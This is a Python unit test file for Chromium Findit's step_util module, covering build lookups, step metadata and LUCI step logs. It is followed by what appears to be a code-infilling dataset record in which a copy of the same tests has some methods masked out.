invalid_build_100 = BuildInfo(master_name, builder_name, 100)
invalid_build_99 = BuildInfo(master_name, builder_name, 99)
valid_build_98 = BuildInfo(master_name, builder_name, 98)
valid_build_98.commit_position = 980
mocked_get_build_info.side_effect = [
invalid_build_100,
invalid_build_99,
valid_build_98,
]
self.assertEqual(
valid_build_98,
step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,
2))
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepExactMatch(self, *_):
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', 0, 100, 30)
self.assertEqual(1, lower_bound.build_number)
self.assertEqual(2, upper_bound.build_number)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):
lower_bound_build_number = 3
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', lower_bound_build_number, 100, 10)
self.assertIsNone(lower_bound)
self.assertEqual(lower_bound_build_number, upper_bound.build_number)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuildInValid(
self, *_):
lower_bound_build_number = 3
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', lower_bound_build_number, 100, 10)
self.assertIsNone(lower_bound)
self.assertIsNone(upper_bound)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitAfterLatestBuild(self, *_):
upper_bound_build_number = 5
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', None, upper_bound_build_number, 10000)
self.assertEqual(upper_bound_build_number, lower_bound.build_number)
self.assertIsNone(upper_bound)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_):
upper_bound_build_number = 5
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', None, upper_bound_build_number, 10000)
self.assertIsNone(lower_bound)
self.assertIsNone(upper_bound)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):
upper_bound_build_number = 4
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', None, upper_bound_build_number, 50)
self.assertEqual(50, lower_bound.commit_position)
self.assertEqual(50, upper_bound.commit_position)
@mock.patch.object(
swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)
@mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)
def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):
upper_bound_build_number = 4
lower_bound_build_number = 1
lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(
'm', 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)
self.assertEqual(20, lower_bound.commit_position)
self.assertEqual(20, upper_bound.commit_position)
def testIsStepSupportedByFinditObjectNone(self):
self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))
@mock.patch.object(
waterfall_config, 'StepIsSupportedForMaster', return_value=False)
def testStepNotSupportedByFindit(self, _):
self.assertFalse(
step_util.IsStepSupportedByFindit(
WebkitLayoutTestResults(None), 'step', 'm'))
def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):
self.assertFalse(
step_util.IsStepSupportedByFindit(
WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))
@mock.patch.object(
waterfall_config, 'StepIsSupportedForMaster', return_value=True)
def testIsStepSupportedByFinditWebkitLayoutTests(self, _):
self.assertTrue(
step_util.IsStepSupportedByFindit(
WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))
@mock.patch.object(
waterfall_config, 'StepIsSupportedForMaster', return_value=True)
def testIsStepSupportedByFinditGtests(self, _):
self.assertTrue(
step_util.IsStepSupportedByFindit(
GtestTestResults(None), 'browser_tests', 'm'))
@parameterized.expand([
({
'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,
'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA
},),
({
'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,
'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA
},),
({
'step_log_return': None,
'expected_step_metadata': None
},),
({
'step_log_return': None,
'expected_step_metadata': None
},),
])
@mock.patch.object(step_util, 'GetStepLogForLuciBuild')
def testGetStepMetadata(self, cases, mock_step_log):
mock_step_log.return_value = cases['step_log_return']
step_metadata = step_util.GetStepMetadata(123, 'step')
self.assertEqual(cases['expected_step_metadata'], step_metadata)
@mock.patch.object(step_util, 'GetStepLogForLuciBuild')
def testGetStepMetadataPartialMatch(self, mock_step_log):
step_util.GetStepMetadata(123, 'step', True)
self.assertIn(True, mock_step_log.call_args[0])
step_util.GetStepMetadata(123, 'step', False)
self.assertIn(False, mock_step_log.call_args[0])
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value='step')
@mock.patch.object(
logdog_util, '_GetStreamForStep', return_value='log_stream')
@mock.patch.object(
logdog_util,
'GetStepLogLegacy',
return_value=json.dumps(wf_testcase.SAMPLE_STEP_METADATA))
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
def testLegacyGetStepMetadata(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')
def testMalformattedNinjaInfo(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog(
'm', 'b', 123, 's', None, 'json.output[ninja_info]')
self.assertIsNone(step_metadata)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value=None)
def testLegacyGetStepMetadataStepNone(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertIsNone(step_metadata)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value='step')
@mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)
def testLegacyGetStepMetadataStreamNone(self, *_):
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertIsNone(step_metadata)
@mock.patch.object(
step_util,
'GetStepLogForLuciBuild',
return_value=wf_testcase.SAMPLE_STEP_METADATA)
@mock.patch.object(build_util, 'DownloadBuildData')
def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):
build = WfBuild.Create('m', 'b', 123)
build.build_id = '8948240770002521488'
build.put()
mock_build.return_value = build
step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata')
self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(
logdog_util, '_GetAnnotationsProtoForPath', return_value='step')
@mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')
@mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log1/nlog2')
def testGetStepLogStdio(self, *_):
self.assertEqual(
'log1/nlog2',
step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None))
@mock.patch.object(
build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())
@mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')
@mock.patch.object(logging, 'error')
def testGetStepLogNotJosonLoadable(self, mocked_log, *_):
self.assertIsNone(
step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,
'step_metadata'))
mocked_log.assert_called_with(
'Failed to json load data for step_metadata. Data is: log.')
@mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)
def testGetStepLogForLuciBuildError(self, _):
self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's', None))
@mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)
@mock.patch.object(logdog_util, 'GetLogFromViewUrl')
@mock.patch.object(buildbucket_client, 'GetV2Build')
def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build, mock_get_log,
_):
build_id = '8945610992972640896'
mock_log = common_pb2.Log()
mock_log.name = 'step_metadata'
mock_log.view_url = 'view_url'
mock_step = Step()
mock_step.name = 's'
mock_step.logs.extend([mock_log])
mock_build = Build()
mock_build.id = int(build_id)
mock_build.steps.extend([mock_step])
mock_get_build.return_value = mock_build
self.assertIsNone(
step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))
self.assertFalse(mock_get_log.called)
@mock.patch.object(
step_util, '_ParseStepLogIfAppropriate', return_value='log')
@mock.patch.object(logdog_util, 'GetLogFromViewUrl', return_value='log')
@mock.patch.object(buildbucket_client, 'GetV2Build')
def testGetStepLogForLuciBuild(self, mock_get_build, mock_get_log, _):
build_id = '8945610992972640896'
mock_log = common_pb2.Log()
mock_log.name = 'step_metadata'
mock_log.view_url = 'view_url'
mock_step = Step()
mock_step.name = 's'
mock_step.logs.extend([mock_log])
mock_build = Build()
mock_build.id = int(build_id)
mock_build.steps.extend([mock_step])
mock_get_build.return_value = mock_build
self.assertEqual(
'log',
step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))
mock_get_log.assert_called_once_with('view_url', None)
@mock.patch.object(buildbucket_client, 'GetV2Build')
@mock.patch.object(step_util, 'GetStepLogFromBuildObject')
def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):
step_util.GetStepLogForLuciBuild('87654321', 's', None)
self.assertIn(False, mock_log_from_build.call_args[0])
step_util.GetStepLogForLuciBuild('87654321', 's', None, True)
self.assertIn(True, mock_log_from_build.call_args[0])
@mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)
def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):
step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',
'http_client')
self.assertIn(False, mock_get_log_url.call_args[0])
step_util.GetStepLogFromBuildObject(
Build(), 'full_step_name', 'http_client', partial_match=True)
self.assertIn(True, mock_get_log_url.call_args[0])
def testGetStepLogViewUrlNoMatchingLog(self):
build_id = 8945610992972640896
mock_log = common_pb2.Log()
mock_log.name = 'another_log'
mock_log.view_url = 'view_url'
mock_step1 = Step()
mock_step1.name = 's1'
mock_step1.logs.extend([mock_log])
mock_step2 = Step()
mock_step2.name = 's2'
mock_step2.logs.extend([mock_log])
mock_build = Build()
mock_build.id = build_id
mock_build.steps.extend([mock_step1, mock_step2])
self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log'))
@parameterized.expand([
(True, 'step_name', 'view_url', 'view_url_partial_match'),
(False, 'step_name', 'view_url', None),
])
def testGetStepLogViewUrlPartialMatching(self, partial_match, full_step_name,
expected_url_in_build1,
expected_url_in_build2):
mock_step1 = Step()
mock_step1.name = 'step_name'
mock_log1 = common_pb2.Log()
mock_log1.name = 'log'
mock_log1.view_url = 'view_url'
mock_step1.logs.extend([mock_log1])
mock_step2 = Step()
mock_step2.name = 'step_name_longer'
mock_log2 = common_pb2.Log()
mock_log2.name = 'log'
mock_log2.view_url = 'view_url_partial_match'
mock_step2.logs.extend([mock_log2])
mock_build1 = Build()
mock_build1.steps.extend([mock_step1, mock_step2])
self.assertEqual(
expected_url_in_build1,
step_util._GetStepLogViewUrl(
mock_build1, full_step_name, 'log', partial_match=partial_match))
mock_build2 = Build()
mock_build2.steps.extend([mock_step2])
self.assertEqual(
expected_url_in_build2,
step_util._GetStepLogViewUrl(
mock_build2, full_step_name, 'log', partial_match=partial_match))
@mock.patch.object(
step_util,
'GetWaterfallBuildStepLog',
return_value={'canonical_step_name': 'unsupported_step1'})
def testStepIsSupportedForMaster(self, _):
master_name = 'master1'
builder_name = 'b'
build_number = 123
step_name = 'unsupported_step1 on master1'
self.assertFalse(
step_util.StepIsSupportedForMaster(master_name, builder_name,
build_number, step_name))
def testStepIsSupportedForMasterCompile(self):
master_name = 'm'
builder_name = 'b'
build_number = 123
step_name = 'compile'
self.assertTrue(
step_util.StepIsSupportedForMaster(master_name, builder_name,
build_number, step_name))
@mock.patch.object(step_util, 'GetWaterfallBuildStepLog')
def testLegacyGetStepMetadataCached(self, mock_fn):
mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]
    # Returns the invalid step_metadata but does not cache it.
self.assertEqual(
'invalid',
step_util.LegacyGetStepMetadata('m', 'b', 201,
'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 1)
    # Returns the valid step_metadata and caches it.
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.LegacyGetStepMetadata('m', 'b', 201,
'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.LegacyGetStepMetadata('m', 'b', 201,
'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
@mock.patch.object(step_util, 'GetStepLogForLuciBuild')
def testGetStepMetadataCached(self, mock_fn, *_):
mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]
    # Returns the invalid step_metadata but does not cache it.
self.assertEqual(None,
step_util.GetStepMetadata(123, 'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 1)
    # Returns the valid step_metadata and caches it.
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.GetStepMetadata(123, 'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
self.assertEqual({
'canonical_step_name': 'step_name'
}, step_util.GetStepMetadata(123, 'step_name on a platform'))
self.assertTrue(mock_fn.call_count == 2)
@mock.patch.object(
step_util,
'LegacyGetStepMetadata',
return_value={'canonical_step_name': 'step_name'})
def testLegacyGetCanonicalStep(self, _):
self.assertEqual(
'step_name',
step_util.LegacyGetCanonicalStepName('m', 'b', 200,
'step_name on a platform'))
@parameterized.expand([({
'canonical_step_name': 'step_name'
}, 'step_name'), (None, 'step_name'), ({
'a': 'b'
}, None)])
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetCanonicalStepName(self, step_metadata, expected_canonical_step,
mocked_get_step):
mocked_get_step.return_value = step_metadata
self.assertEqual(
expected_canonical_step,
step_util.GetCanonicalStepName(123, 'step_name (with patch)'))
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):
step_util.GetCanonicalStepName(123, 'full step name')
self.assertIn(False, mock_get_step_metadata.call_args[0])
step_util.GetCanonicalStepName(123, 'full step name', True)
self.assertIn(True, mock_get_step_metadata.call_args[0])
@mock.patch.object(
step_util,
'LegacyGetStepMetadata',
return_value={'isolate_target_name': 'browser_tests'})
def testLegacyGetIsolateTargetName(self, _):
self.assertEqual(
'browser_tests',
step_util.LegacyGetIsolateTargetName(
'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))
@mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)
def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):
self.assertEqual(
None,
step_util.LegacyGetIsolateTargetName(
'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))
@mock.patch.object(
step_util, 'LegacyGetStepMetadata', return_value={'a': 'b'})
def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):
self.assertEqual(
None,
step_util.LegacyGetIsolateTargetName(
'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))
@parameterized.expand([({
'isolate_target_name': 'isolate_target'
}, 'isolate_target'), (None, None), ({
'a': 'b'
}, None)])
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetIsolateTargetName(self, step_metadata, expected_isolate_target,
mocked_get_stepmeta):
mocked_get_stepmeta.return_value = step_metadata
self.assertEqual(expected_isolate_target,
step_util.GetIsolateTargetName(123, 'full step name'))
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):
step_util.GetIsolateTargetName(123, 'full step name')
self.assertIn(False, mock_get_step_metadata.call_args[0])
step_util.GetIsolateTargetName(123, 'full step name', True)
self.assertIn(True, mock_get_step_metadata.call_args[0])
@parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),
(None, None)])
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetOS(self, mock_fn_return, expected_platform, mock_fn):
mock_fn.return_value = mock_fn_return
self.assertEqual(expected_platform,
step_util.GetOS(123, 'builder_name', 'step_name'))
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetOSPartialMatch(self, mock_get_step_metadata):
step_util.GetOS(123, 'builder_name', 'step_name')
self.assertIn(False, mock_get_step_metadata.call_args[0])
step_util.GetOS(123, 'builder_name', 'step_name', True)
self.assertIn(True, mock_get_step_metadata.call_args[0])
@mock.patch.object(
step_util,
'GetStepMetadata',
return_value=wf_testcase.SAMPLE_STEP_METADATA)
def testGetOSCached(self, mock_fn):
self.assertEqual('platform',
step_util.GetOS(123, 'builder_name', 'step_name'))
self.assertEqual(1, mock_fn.call_count)
self.assertEqual('platform',
step_util.GetOS(123, 'builder_name', 'step_name'))
self.assertEqual(1, mock_fn.call_count)
def testGetStepStartAndEndTime(self):
build_id = '8945610992972640896'
start_time = datetime.datetime(2019, 3, 6)
end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)
step = Step()
step.name = 's'
step.start_time.FromDatetime(start_time)
step.end_time.FromDatetime(end_time)
build = Build()
build.id = int(build_id)
build.steps.extend([step])
self.assertEqual((start_time, end_time),
step_util.GetStepStartAndEndTime(build, 's'))
self.assertEqual((None, None), step_util.GetStepStartAndEndTime(
build, 's2'))
|
normal
|
{
"blob_id": "325efe65030ad3488a7fc45c0d4a289eb0b17196",
"index": 1311,
"step-1": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n <mask token>\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n <mask token>\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def 
testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n <mask token>\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n <mask token>\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n <mask token>\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n <mask token>\n <mask token>\n\n 
@mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, 
